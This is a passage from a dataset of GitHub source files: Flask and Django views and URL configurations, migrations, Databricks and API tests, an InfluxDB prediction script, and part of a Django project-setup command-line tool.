document.metadata = data['metadata']\n\n logger.info('Created document with id=%s', document.get_id())\n\n for index in indexes:\n index.add_to_index(document)\n logger.info('Added document %s to index %s',\n document.get_id(), index.name)\n\n if len(request.files):\n self.attach_files(document)\n\n return self.detail(document.get_id())\n\n def update(self, pk):\n document = self._get_document(pk)\n data = validator.parse_post([], [\n 'content',\n 'identifier',\n 'index',\n 'indexes',\n 'metadata'])\n\n save_document = False\n if data.get('content'):\n document.content = data['content']\n save_document = True\n if data.get('identifier'):\n document.identifier = data['identifier']\n save_document = True\n\n if save_document:\n document.save()\n logger.info('Updated document with id = %s', document.get_id())\n\n if 'metadata' in data:\n del document.metadata\n if data['metadata']:\n document.metadata = data['metadata']\n\n if len(request.files):\n self.attach_files(document)\n\n indexes = validator.validate_indexes(data, required=False)\n if indexes is not None:\n with database.atomic():\n (IndexDocument\n .delete()\n .where(IndexDocument.document == document)\n .execute())\n\n if indexes:\n IndexDocument.insert_many([\n {'index': index, 'document': document}\n for index in indexes]).execute()\n\n return self.detail(document.get_id())\n\n def delete(self, pk):\n document = 
self._get_document(pk)\n\n with database.atomic():\n (IndexDocument\n .delete()\n .where(IndexDocument.document == document)\n .execute())\n (Attachment\n .delete()\n .where(Attachment.document == document)\n .execute())\n Metadata.delete().where(Metadata.document == document).execute()\n document.delete_instance()\n logger.info('Deleted document with id = %s', document.get_id())\n\n return jsonify({'success': True})\n\n\nclass AttachmentView(_FileProcessingView):\n def _get_attachment(self, document, pk):\n return get_object_or_404(\n document.attachments,\n Attachment.filename == pk)\n\n def detail(self, document_id, pk):\n document = self._get_document(document_id)\n attachment = self._get_attachment(document, pk)\n return jsonify(attachment_serializer.serialize(attachment))\n\n def list_view(self, document_id):\n document = self._get_document(document_id)\n query = (Attachment\n .select(Attachment, BlobData)\n .join(\n BlobData,\n on=(Attachment.hash == BlobData.hash).alias('_blob'))\n .where(Attachment.document == document))\n\n ordering = request.args.getlist('ordering')\n query = engine.apply_rank_and_sort(query, None, ordering, {\n 'document': Attachment.document,\n 'hash': Attachment.hash,\n 'filename': Attachment.filename,\n 'mimetype': Attachment.mimetype,\n 'timestamp': Attachment.timestamp,\n 'id': Attachment.id,\n }, 'filename')\n\n pq = self.paginated_query(query)\n return jsonify({\n 'attachments': [attachment_serializer.serialize(attachment)\n for attachment in pq.get_object_list()],\n 'ordering': ordering,\n 'page': pq.get_page(),\n 'pages': pq.get_page_count()})\n\n def create(self, document_id):\n document = self._get_document(document_id)\n validator.parse_post([], []) # Ensure POST data is clean.\n\n if len(request.files):\n attachments = self.attach_files(document)\n else:\n error('No file attachments found.')\n\n return jsonify({'attachments': [\n attachment_serializer.serialize(attachment)\n for attachment in attachments]})\n\n def update(self, document_id, pk):\n document = self._get_document(document_id)\n attachment = self._get_attachment(document, pk)\n validator.parse_post([], []) # Ensure POST data is clean.\n\n nfiles = len(request.files)\n if nfiles == 1:\n attachment.delete_instance()\n self.attach_files(document)\n elif nfiles > 1:\n error('Only one attachment permitted when performing update.')\n else:\n error('No file attachment found.')\n\n return self.detail(document.get_id(), attachment.filename)\n\n def delete(self, document_id, pk):\n document = self._get_document(document_id)\n attachment = self._get_attachment(document, pk)\n attachment.delete_instance()\n return jsonify({'success': True})\n\n\ndef attachment_download(document_id, pk):\n document = get_object_or_404(\n Document.all(),\n Document._meta.primary_key == document_id)\n attachment = get_object_or_404(\n document.attachments,\n Attachment.filename == pk)\n\n response = make_response(attachment.blob.data)\n response.headers['Content-Type'] = attachment.mimetype\n response.headers['Content-Length'] = attachment.length\n response.headers['Content-Disposition'] = 'inline; filename=%s' % (\n attachment.filename)\n\n return response\n","repo_name":"coleifer/scout","sub_path":"scout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15537,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"35911689682","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views 
import login, logout_then_login\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/login/$', login, name="login"),\n url(r'^accounts/logout/$', logout_then_login, name="logout"),\n url('', include('social_django.urls', namespace='social')),\n url(r'^lists/', include('lists.urls', namespace = 'lists')),\n url(r'^', include('lists.urls', namespace = 'lists')),\n]\n","repo_name":"MomomeYeah/FancyLists","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20107850919","text":"import unittest\nfrom nikel_py import Buildings\n\nimport asyncio\n\ndef async_wrapper(f):\n def wrapper(*args, **kwargs):\n # asyncio.coroutine was deprecated and removed in Python 3.11; run the async test directly\n return asyncio.run(f(*args, **kwargs))\n return wrapper\n\n'''\nData is subject to change. As such, Test Cases may or may not work in the future\n'''\n\n\nclass BuildingsTestCase(unittest.TestCase):\n\n def test_sync(self):\n\n #Gets name of Building where the Postal Code contains M5S\n\n x = Buildings.get({'address' : '~M5S'}, limit=1)[0]\n self.assertEqual(x.name, "University College")\n\n\n @async_wrapper\n async def test_async(self):\n\n #Gets Code of Building that has the name 'Hart House'\n\n x = await Buildings.async_get({'name' : 'Hart House'}, limit=1)\n x = x[0]\n self.assertEqual(x.code, "HH")\n\n\n\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"Multivalence/nikel-py","sub_path":"tests/test_buildings.py","file_name":"test_buildings.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22416484235","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('desk', '0002_auto_20170311_2020'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='financialoperation',\n name='positionNumber',\n field=models.BigIntegerField(default=0),\n preserve_default=False,\n ),\n ]\n","repo_name":"icewind666/cashdesk-2","sub_path":"Cashdesk/desk/migrations/0003_financialoperation_positionnumber.py","file_name":"0003_financialoperation_positionnumber.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33799254138","text":"import pickle\nimport pandas as pd\nimport numpy as np\nfrom influxdb import InfluxDBClient\n\nclient = InfluxDBClient(host='influxus.itu.dk', port=8086, username='lsda', password='icanonlyread')\nclient.switch_database('orkney')\n\ndf = pd.DataFrame()\n\nresults = client.query('SELECT mean(Total) FROM "Demand" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw["series"][0]["values"]\ndf = pd.concat([df, pd.DataFrame(values,columns=['time', 'demand'])], axis=1)\n\nresults = client.query('SELECT mean("M/S") FROM "Wind" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw["series"][0]["values"]\ndf = df.merge(pd.DataFrame(values, columns=['time', 'wind']), on='time')\n\nresults = client.query('SELECT mean("u") FROM "Wind" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw["series"][0]["values"]\ndf = df.merge(pd.DataFrame(values, 
columns=['time', 'u wind']), on='time')\n\nresults = client.query('SELECT mean("v") FROM "Wind" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw["series"][0]["values"]\ndf = df.merge(pd.DataFrame(values, columns=['time', 'v wind']), on='time')\n\ndf = df.fillna(0)\narray = np.array(df)\n\n# Column means (excluding the time column), used as a fallback fill value\nmeans = np.mean(array[:,1:].astype(float),axis=0)\n\n# Interpolate missing (zero) readings from the surrounding non-zero values, falling back to the column mean\nfor num in range(2,len(array[0])):\n startidx = 0\n for idx,i in enumerate(array):\n if i[num] == 0.0:\n for x in range(idx, len(array)):\n if array[x][num] != 0.0:\n mean = np.mean([array[startidx,num], array[x,num]])\n\n if mean == 0:\n mean = means[num]\n array[idx,num] = mean\n else:\n startidx = idx\n\n# Smooth any remaining zeros with the mean of the neighbouring rows\nfor i in range(len(array)):\n for j in range(len(array[i])):\n if array[i,j]==0:\n array[i,j] = np.mean([array[i-1,j],array[i+1,j]])\n\nx = array[:,1:]\n\n# Load the pre-trained model saved by the training script\nsvc = pickle.load(open('trained_model.sav', 'rb'))\n\npred = pd.DataFrame(svc.predict(x))\npred.to_csv('predicted_curtailment.csv', index=False)\n","repo_name":"gergokoncz/itu","sub_path":"4th_semester/large_scale_data/assignment2/Assignment 2/predicting.py","file_name":"predicting.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33494401883","text":"from django.conf.urls import patterns, include, url\nfrom fitness import views\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'fitness.views.home', name='home'),\n # url(r'^fitness/', include('fitness.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n\turl(r'^workouts/', include('workouts.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^my_admin/jsi18n', 'django.views.i18n.javascript_catalog'),\n\n\n #User authentication\n url(r'^accounts/login/$', 'fitness.views.login'),\n url(r'^accounts/auth/$', 'fitness.views.auth_view'),\n url(r'^accounts/logout/$', 'fitness.views.logout'),\n url(r'^accounts/loggedin/$', 'fitness.views.loggedin'),\n url(r'^accounts/invalid/$', 'fitness.views.invalid_login'),\n url(r'^accounts/register/$', 'fitness.views.register_user'),\n url(r'^accounts/register_success/$', 'fitness.views.register_success'),\n\n)\n","repo_name":"kickdrumventures/fitness","sub_path":"fitness/fitness/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892220727","text":"import os\nfrom typing import Dict\nfrom unittest import mock\n\nimport pytest\nfrom dagster import In, Out, execute_job, fs_io_manager, graph, op, reconstructable\nfrom dagster._core.definitions.no_step_launcher import no_step_launcher\nfrom dagster._core.test_utils import instance_for_test\nfrom dagster._utils.merger import deep_merge_dicts\nfrom dagster_aws.s3 import s3_pickle_io_manager, s3_resource\nfrom dagster_azure.adls2 import adls2_pickle_io_manager, adls2_resource\nfrom dagster_databricks import (\n databricks_pyspark_step_launcher,\n)\nfrom dagster_databricks.types import (\n DatabricksRunLifeCycleState,\n DatabricksRunResultState,\n DatabricksRunState,\n)\nfrom dagster_pyspark import DataFrame, pyspark_resource\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import IntegerType, StringType, 
StructField, StructType\n\nS3_BUCKET = \"dagster-databricks-tests\"\nADLS2_STORAGE_ACCOUNT = \"dagsterdatabrickstests\"\nADLS2_CONTAINER = \"dagster-databricks-tests\"\n\n\nBASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG: Dict[str, object] = {\n \"databricks_host\": os.environ.get(\"DATABRICKS_HOST\") or \"https://\",\n \"databricks_token\": os.environ.get(\"DATABRICKS_TOKEN\"),\n \"local_job_package_path\": os.path.abspath(os.path.dirname(__file__)),\n \"staging_prefix\": \"/dagster-databricks-tests\",\n \"run_config\": {\n \"cluster\": {\n \"new\": {\n \"size\": {\"num_workers\": 1},\n \"spark_version\": \"6.5.x-scala2.11\",\n \"nodes\": {\n \"node_types\": {\"node_type_id\": \"Standard_DS3_v2\"},\n },\n },\n },\n \"libraries\": [\n {\"pypi\": {\"package\": \"azure-storage-file-datalake~=12.0.1\"}},\n {\"pypi\": {\"package\": \"dagster-aws\"}},\n {\"pypi\": {\"package\": \"dagster-azure\"}},\n {\"pypi\": {\"package\": \"databricks-api\"}},\n {\"pypi\": {\"package\": \"pytest\"}},\n ],\n },\n \"permissions\": {\n \"cluster_permissions\": {\"CAN_MANAGE\": [{\"group_name\": \"my_group\"}]},\n \"job_permissions\": {\"CAN_MANAGE_RUN\": [{\"user_name\": \"my_user\"}]},\n },\n \"secrets_to_env_variables\": [],\n \"env_variables\": {},\n \"storage\": {\n \"s3\": {\n \"secret_scope\": \"dagster-databricks-tests\",\n \"access_key_key\": \"aws-access-key\",\n \"secret_key_key\": \"aws-secret-key\",\n }\n },\n}\n\n\n@op(\n out=Out(dagster_type=DataFrame),\n required_resource_keys={\"pyspark_step_launcher\", \"pyspark\"},\n)\ndef make_df_op(context):\n schema = StructType([StructField(\"name\", StringType()), StructField(\"age\", IntegerType())])\n rows = [\n Row(name=\"John\", age=19),\n Row(name=\"Jennifer\", age=29),\n Row(name=\"Henry\", age=50),\n ]\n return context.resources.pyspark.spark_session.createDataFrame(rows, schema)\n\n\n@op(\n name=\"blah\",\n description=\"this is a test\",\n config_schema={\"foo\": str, \"bar\": int},\n ins={\"people\": In(dagster_type=DataFrame)},\n out=Out(dagster_type=DataFrame),\n required_resource_keys={\"pyspark_step_launcher\"},\n)\ndef filter_df_op(_, people):\n return people.filter(people[\"age\"] < 30)\n\n\nADLS2_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": databricks_pyspark_step_launcher,\n \"pyspark\": pyspark_resource,\n \"adls2\": adls2_resource,\n \"io_manager\": adls2_pickle_io_manager,\n}\nS3_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": databricks_pyspark_step_launcher,\n \"pyspark\": pyspark_resource,\n \"s3\": s3_resource,\n \"io_manager\": s3_pickle_io_manager,\n}\nTEST_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": databricks_pyspark_step_launcher,\n \"pyspark\": pyspark_resource,\n \"io_manager\": fs_io_manager,\n}\nLOCAL_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": no_step_launcher,\n \"pyspark\": pyspark_resource,\n}\n\n\n@graph\ndef pyspark_graph():\n filter_df_op(make_df_op())\n\n\npyspark_local_job = pyspark_graph.to_job(resource_defs=LOCAL_RESOURCE_DEFS)\npyspark_s3_job = pyspark_graph.to_job(resource_defs=S3_RESOURCE_DEFS)\npyspark_adls2_job = pyspark_graph.to_job(resource_defs=ADLS2_RESOURCE_DEFS)\n\n\ndef define_pyspark_local_job():\n return pyspark_local_job\n\n\ndef define_pyspark_s3_job():\n return pyspark_s3_job\n\n\ndef define_pyspark_adls2_job():\n return pyspark_adls2_job\n\n\n@op(\n required_resource_keys={\"pyspark_step_launcher\", \"pyspark\"},\n)\ndef do_nothing_op(_):\n pass\n\n\n@graph\ndef do_nothing_graph():\n do_nothing_op()\n\n\ndo_nothing_local_job = 
do_nothing_graph.to_job(resource_defs=LOCAL_RESOURCE_DEFS)\ndo_nothing_test_job = do_nothing_graph.to_job(resource_defs=TEST_RESOURCE_DEFS)\n\n\ndef define_do_nothing_test_job():\n return do_nothing_test_job\n\n\ndef test_local():\n result = pyspark_local_job.execute_in_process(\n run_config={\n \"ops\": {\n \"blah\": {\"config\": {\"foo\": \"a string\", \"bar\": 123}},\n }\n }\n )\n assert result.success\n\n\n@mock.patch(\"databricks.sdk.core.Config\")\n@mock.patch(\"databricks.sdk.JobsAPI.submit\")\n@mock.patch(\"dagster_databricks.databricks.DatabricksClient.read_file\")\n@mock.patch(\"dagster_databricks.databricks.DatabricksClient.put_file\")\n@mock.patch(\"dagster_databricks.DatabricksPySparkStepLauncher.get_step_events\")\n@mock.patch(\"databricks.sdk.JobsAPI.get_run\")\n@mock.patch(\"dagster_databricks.databricks.DatabricksClient.get_run_state\")\n@mock.patch(\"databricks.sdk.core.ApiClient.do\")\ndef test_pyspark_databricks(\n mock_perform_query,\n mock_get_run_state,\n mock_get_run,\n mock_get_step_events,\n mock_put_file,\n mock_read_file,\n mock_submit_run,\n mock_config,\n):\n mock_submit_run_response = mock.Mock()\n mock_submit_run_response.bind.return_value = {\"run_id\": 12345}\n mock_submit_run.return_value = mock_submit_run_response\n mock_read_file.return_value = \"somefilecontents\".encode()\n\n running_state = DatabricksRunState(DatabricksRunLifeCycleState.RUNNING, None, \"\")\n final_state = DatabricksRunState(\n DatabricksRunLifeCycleState.TERMINATED, DatabricksRunResultState.SUCCESS, \"\"\n )\n mock_get_run_state.side_effect = [running_state] * 5 + [final_state]\n\n with instance_for_test() as instance:\n result = do_nothing_local_job.execute_in_process(instance=instance)\n mock_get_step_events.return_value = [\n event for event in instance.all_logs(result.run_id) if event.step_key == \"do_nothing_op\"\n ]\n\n # Test 1 - successful execution\n\n with instance_for_test() as instance:\n config = BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG.copy()\n config.pop(\"local_job_package_path\")\n result = execute_job(\n job=reconstructable(define_do_nothing_test_job),\n instance=instance,\n run_config={\n \"resources\": {\n \"pyspark_step_launcher\": {\n \"config\": deep_merge_dicts(\n config,\n {\n \"databricks_host\": \"https://\",\n \"databricks_token\": \"\",\n \"poll_interval_sec\": 0.1,\n \"local_dagster_job_package_path\": os.path.abspath(\n os.path.dirname(__file__)\n ),\n },\n ),\n },\n },\n \"execution\": {\"config\": {\"in_process\": {}}},\n },\n )\n assert result.success\n assert mock_perform_query.call_count == 2\n assert mock_get_run.call_count == 1\n assert mock_get_run_state.call_count == 6\n assert mock_get_step_events.call_count == 6\n assert mock_put_file.call_count == 4\n assert mock_read_file.call_count == 2\n assert mock_submit_run.call_count == 1\n\n # Test 2 - attempting to update permissions for an existing cluster\n\n with instance_for_test() as instance:\n config = BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG.copy()\n config.pop(\"local_job_package_path\")\n config[\"run_config\"][\"cluster\"] = {\"existing\": \"cluster_id\"}\n with pytest.raises(ValueError) as excinfo:\n execute_job(\n job=reconstructable(define_do_nothing_test_job),\n instance=instance,\n run_config={\n \"resources\": {\n \"pyspark_step_launcher\": {\n \"config\": deep_merge_dicts(\n config,\n {\n \"databricks_host\": \"https://\",\n \"databricks_token\": \"\",\n \"poll_interval_sec\": 0.1,\n \"local_dagster_job_package_path\": os.path.abspath(\n os.path.dirname(__file__)\n ),\n 
},\n ),\n },\n },\n \"execution\": {\"config\": {\"in_process\": {}}},\n },\n raise_on_error=True,\n )\n\n assert (\n str(excinfo.value)\n == \"Attempting to update permissions of an existing cluster. This is dangerous and\"\n \" thus unsupported.\"\n )\n\n\n@pytest.mark.skipif(\n \"DATABRICKS_TEST_DO_IT_LIVE_S3\" not in os.environ,\n reason=\"This test is slow and requires a Databricks cluster; run only upon explicit request\",\n)\ndef test_do_it_live_databricks_s3():\n result = execute_job(\n reconstructable(define_pyspark_s3_job),\n run_config={\n \"ops\": {\"blah\": {\"config\": {\"foo\": \"a string\", \"bar\": 123}}},\n \"resources\": {\n \"pyspark_step_launcher\": {\"config\": BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG},\n \"io_manager\": {\n \"config\": {\n \"s3_bucket\": \"elementl-databricks\",\n \"s3_prefix\": \"dagster-test\",\n }\n },\n },\n },\n )\n assert result.success\n\n\n@pytest.mark.skipif(\n \"DATABRICKS_TEST_DO_IT_LIVE_ADLS2\" not in os.environ,\n reason=\"This test is slow and requires a Databricks cluster; run only upon explicit request\",\n)\ndef test_do_it_live_databricks_adls2():\n config = BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG.copy()\n config[\"storage\"] = {\n \"adls2\": {\n \"secret_scope\": \"dagster-databricks-tests\",\n \"storage_account_name\": ADLS2_STORAGE_ACCOUNT,\n \"storage_account_key_key\": \"adls2-storage-key\",\n }\n }\n\n result = execute_job(\n reconstructable(define_pyspark_adls2_job),\n run_config={\n \"ops\": {\"blah\": {\"config\": {\"foo\": \"a string\", \"bar\": 123}}},\n \"resources\": {\n \"pyspark_step_launcher\": {\"config\": config},\n \"adls2\": {\n \"config\": {\n \"storage_account\": ADLS2_STORAGE_ACCOUNT,\n \"credential\": {\"key\": os.environ.get(\"AZURE_STORAGE_ACCOUNT_KEY\")},\n }\n },\n \"io_manager\": {\n \"config\": {\n \"adls2_file_system\": ADLS2_CONTAINER,\n \"adls2_prefix\": \"dagster-databricks-tests\",\n }\n },\n },\n },\n )\n assert result.success\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-databricks/dagster_databricks_tests/test_pyspark.py","file_name":"test_pyspark.py","file_ext":"py","file_size_in_byte":11429,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"33156731568","text":"\"\"\"Energy production timeseries by buildings resources\"\"\"\nfrom flask.views import MethodView\nfrom flask_smorest import abort\n\nfrom bemserver_core.model import EnergyProductionTimeseriesByBuilding\n\nfrom bemserver_api import Blueprint\nfrom bemserver_api.database import db\n\nfrom .schemas import (\n EnergyProductionTimeseriesByBuildingSchema,\n EnergyProductionTimeseriesByBuildingQueryArgsSchema,\n)\n\n\nblp = Blueprint(\n \"EnergyProductionTimeseriesByBuilding\",\n __name__,\n url_prefix=\"/energy_production_timeseries_by_buildings\",\n description=\"Operations on energy production timeseries x building associations\",\n)\n\n\n@blp.route(\"/\")\nclass EnergyProductionTimeseriesByBuildingViews(MethodView):\n @blp.login_required\n @blp.etag\n @blp.arguments(\n EnergyProductionTimeseriesByBuildingQueryArgsSchema, location=\"query\"\n )\n @blp.response(200, EnergyProductionTimeseriesByBuildingSchema(many=True))\n def get(self, args):\n \"\"\"List energy production timeseries x building associations\"\"\"\n return EnergyProductionTimeseriesByBuilding.get(**args)\n\n @blp.login_required\n @blp.etag\n @blp.arguments(EnergyProductionTimeseriesByBuildingSchema)\n @blp.response(201, EnergyProductionTimeseriesByBuildingSchema)\n 
@blp.catch_integrity_error\n def post(self, new_item):\n \"\"\"Add a new energy production timeseries x building association\"\"\"\n item = EnergyProductionTimeseriesByBuilding.new(**new_item)\n db.session.commit()\n return item\n\n\n@blp.route(\"/\")\nclass EnergyProductionTimeseriesByBuildingByIdViews(MethodView):\n @blp.login_required\n @blp.etag\n @blp.response(200, EnergyProductionTimeseriesByBuildingSchema)\n def get(self, item_id):\n \"\"\"Get energy production timeseries x building association by ID\"\"\"\n item = EnergyProductionTimeseriesByBuilding.get_by_id(item_id)\n if item is None:\n abort(404)\n return item\n\n @blp.login_required\n @blp.etag\n @blp.arguments(EnergyProductionTimeseriesByBuildingSchema)\n @blp.response(200, EnergyProductionTimeseriesByBuildingSchema)\n @blp.catch_integrity_error\n def put(self, new_item, item_id):\n \"\"\"Update an existing energy production timeseries x building association\"\"\"\n item = EnergyProductionTimeseriesByBuilding.get_by_id(item_id)\n if item is None:\n abort(404)\n blp.check_etag(item, EnergyProductionTimeseriesByBuildingSchema)\n item.update(**new_item)\n db.session.commit()\n return item\n\n @blp.login_required\n @blp.etag\n @blp.response(204)\n def delete(self, item_id):\n \"\"\"Delete a energy production timeseries x building association\"\"\"\n item = EnergyProductionTimeseriesByBuilding.get_by_id(item_id)\n if item is None:\n abort(404)\n blp.check_etag(item, EnergyProductionTimeseriesByBuildingSchema)\n item.delete()\n db.session.commit()\n","repo_name":"BEMServer/bemserver-api","sub_path":"bemserver_api/resources/energy_production_timeseries_by_buildings/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44722200955","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport subprocess\nimport site\nfrom shutil import copyfile\nimport argparse\nfrom urllib.parse import urlparse\n#from virtualenv import cli_run\nimport venv\n\nimport django\nfrom django.utils.version import get_docs_version\nfrom django.core.management.utils import get_random_secret_key\n\nimport mozumder\n\ndef create():\n parser = argparse.ArgumentParser(\n description='Create a new Mozumder project.')\n subparsers = parser.add_subparsers(help='Create new project, or create UWSGI vassals file', dest='subparser_name')\n parser_startproject = subparsers.add_parser('startproject', help='Create a new Mozumder project')\n parser_uwsgi = subparsers.add_parser('createuwsgi', help='Create a UWSGI Vassal .ini file')\n parser_h2o = subparsers.add_parser('createh2o', help='Create h2o config file')\n\n parser.add_argument(\n 'project_name',\n action='store',\n help='Name of project. 
Project directory will be created with this name.')\n\n parser_startproject.set_defaults(func=startproject)\n parser_uwsgi.set_defaults(func=createuwsgi)\n parser_h2o.set_defaults(func=createh2o)\n\n parser_startproject.add_argument(\n '--db_url',\n action='store',\n help='Database connection URL in the format: postgresql://[user[:password]@][netloc][:port][/dbname][?param1=value1&...]')\n parser_startproject.add_argument(\n '--db_name',\n action='store',\n default='project_name',\n help='When not using a database URL, name of database to connect to')\n parser_startproject.add_argument(\n '--db_host',\n action='store',\n help='When not using a database URL, hostname or IP address of database server')\n parser_startproject.add_argument(\n '--db_port',\n action='store',\n help='When not using a database URL, port number of database server')\n parser_startproject.add_argument(\n '--db_user_name',\n action='store',\n help='When not using a database URL, username to connect to the database')\n parser_startproject.add_argument(\n '--db_user_password',\n action='store',\n help='When not using a database URL, password of user connecting to the database')\n parser_startproject.add_argument(\n '--allowed_hosts',\n nargs='*',\n action='store',\n default=['127.0.0.1'],\n help='Comma separated lists of hosts that are allowed to accept connections for the site. Default to: 127.0.0.1')\n parser_startproject.add_argument(\n '--log_dir',\n action='store',\n default='log',\n help='Django log directory. Default to: log')\n parser_startproject.add_argument(\n '--static_dir',\n action='store',\n default='static',\n help='Static files directory. Default to: static')\n parser_startproject.add_argument(\n '--media_dir',\n action='store',\n default='media',\n help='Django log directory. Default to: media')\n parser_startproject.add_argument(\n '--static_url',\n action='store',\n default='static',\n help='Static files URL path. Default to: static')\n parser_startproject.add_argument(\n '--media_url',\n action='store',\n default='media',\n help='Media files URL path. Default to: media')\n parser_startproject.add_argument(\n '--admin_url',\n action='store',\n default='admin',\n help='Admin URL path. Default to: admin')\n parser_startproject.add_argument(\n '--virtualenv_dir',\n action='store',\n default='venv',\n help='Python virtualenv directory. Default to: venv')\n parser_startproject.add_argument(\n '--develop_path',\n action='store',\n default='venv',\n help='Use django-mozumder in developer mode by providing path to source tree.')\n parser_startproject.add_argument(\n '--site_name',\n action='store',\n default='Mozumder Website',\n help='Full Name of site. Default: \"Mozumder Website\"')\n parser_startproject.add_argument(\n '--site_short_name',\n action='store',\n default='Mozumder',\n help='Short Name of site. Default: Mozumder')\n parser_startproject.add_argument(\n '--site_description',\n action='store',\n default='A new website',\n help='Site description. Default: \"A new website\"')\n parser_startproject.add_argument(\n '--site_lang',\n action='store',\n default='en-US',\n help='Site default language. Default: en-US')\n parser_startproject.add_argument(\n '--site_theme_color',\n action='store',\n default='black',\n help='Site theme color. Default: black')\n parser_startproject.add_argument(\n '--site_background_color',\n action='store',\n default='pink',\n help='Site theme color. Default: pink')\n parser_startproject.add_argument(\n '--hostname',\n action='store',\n help='Full Host name for HTTP server. 
Example: www.example.com')\n parser_startproject.add_argument(\n '--domainname',\n action='store',\n help='Top-level domain name for this server. This will be permanently redirected to the server hostname. Example: example.com')\n parser_startproject.add_argument(\n '--redirects',\n action='store',\n help='List of additional domains that will be temporarily redirected to this HTTP host. Example: host1.example.com host2.example.com')\n parser_startproject.add_argument(\n '--letsencrypt_dir',\n action='store',\n default='/usr/local/etc/letsencrypt/live',\n help='Letsencrypt live key directory. Default to: /usr/local/etc/letsencrypt/live')\n parser_startproject.add_argument(\n '--h2o_log_dir',\n action='store',\n default='/var/log/h2o',\n help='H2O log directory. Default to: /var/log/uwsgi')\n parser_startproject.add_argument(\n '--uwsgi_http_sockets',\n nargs='*',\n action='store',\n default=['127.0.0.1:8010'],\n help='Comma separated list of additional UWSGI HTTP sockets. Connect to these for debugging purposes without going through the main HTTP reverse proxy web server. Make sure these are only accessible in your debug environment. Default to: 127.0.0.1:8010')\n parser_startproject.add_argument(\n '--uwsgi_processes',\n action='store',\n default=1,\n type=int,\n help='Number of UWSGI processes to run. Default 1.')\n parser_startproject.add_argument(\n '--uwsgi_threads',\n action='store',\n default=8,\n type=int,\n help='Number of threads per UWSGI process to run. Default 8.')\n parser_startproject.add_argument(\n '--uwsgi_run_dir',\n action='store',\n default='/var/run/uwsgi',\n help='UWSGI run directory for temporary run files. Default to: /var/run/uwsgi')\n parser_startproject.add_argument(\n '--uwsgi_log_dir',\n action='store',\n default='/var/log/uwsgi',\n help='UWSGI log directory. Default to: /var/log/uwsgi')\n parser_startproject.add_argument(\n '--create_db',\n action='store_true',\n help='Create Postgres user and database')\n parser_startproject.add_argument(\n '--db_admin_url',\n action='store',\n default='postgresql://postgres@127.0.0.1',\n help='Postgresql Admin database connection URL. This will be used to log in and create the new project database and user. Only uses username and password information. 
Database connection URL in the format: postgresql://[user[:password]@][netloc][:port][/dbname][?param1=value1&...]')\n parser_startproject.add_argument(\n '--db_admin_name',\n action='store',\n help='When not using an database admin URL, admin username to connect to the database')\n parser_startproject.add_argument(\n '--db_admin_password',\n action='store',\n help='When not using an database admin URL, password of admin connecting to the database')\n parser_startproject.add_argument(\n '--create_uwsgi',\n action='store_true',\n default=False,\n help='Create a UWSGI vassals file.')\n parser_startproject.add_argument(\n '--create_h2o',\n action='store_true',\n default=False,\n help='Create h2o config file.')\n parser_startproject.add_argument(\n '--create_venv',\n action='store_true',\n default=False,\n help='Create Python Virtualenv.')\n\n\n parser_uwsgi.add_argument(\n '--db_url',\n action='store',\n help='Database connection URL in the format: postgresql://[user[:password]@][netloc][:port][/dbname][?param1=value1&...]')\n parser_uwsgi.add_argument(\n '--db_name',\n action='store',\n default='project_name',\n help='When not using a database URL, name of database to connect to')\n parser_uwsgi.add_argument(\n '--db_host',\n action='store',\n help='When not using a database URL, hostname or IP address of database server')\n parser_uwsgi.add_argument(\n '--db_port',\n action='store',\n help='When not using a database URL, port number of database server')\n parser_uwsgi.add_argument(\n '--db_user_name',\n action='store',\n help='When not using a database 